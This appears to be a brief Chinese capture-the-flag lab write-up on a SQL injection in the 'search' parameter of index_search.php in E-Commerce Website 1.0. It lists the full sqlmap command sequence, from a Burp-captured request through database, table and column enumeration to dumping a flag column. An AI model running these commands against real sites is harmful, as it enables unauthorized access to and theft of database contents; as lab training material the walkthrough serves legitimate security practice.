靶标介绍:
E-Commerce Website 1.0 允许通过“index_search.php”中的参数“search”进行 SQL 注入。利用这个问题可能会使攻击者有机会破坏应用程序,访问或修改数据,或者利用底层数据库中的最新漏洞。
开启靶场:
漏洞验证:
1、网页下拉,找到search搜索栏。
2、输入数字“1”,使用burp抓包。
3、保存post包为55.txt
4、使用sqlmap暴库
sqlmap.py -r 55.txt --batch --dbs
5、找当前数据库
sqlmap.py -r 55.txt --batch --current-db
6、sqlmap爆表
sqlmap.py -r 55.txt --batch -D electricks --tables
7、sqlmap暴列
sqlmap.py -r 55.txt --batch -D electricks -T flllaaaag --columns
8、sqlmap暴字段
sqlmap.py -r 55.txt --batch -D electricks -T flllaaaag -C flag --dump
9、得到flag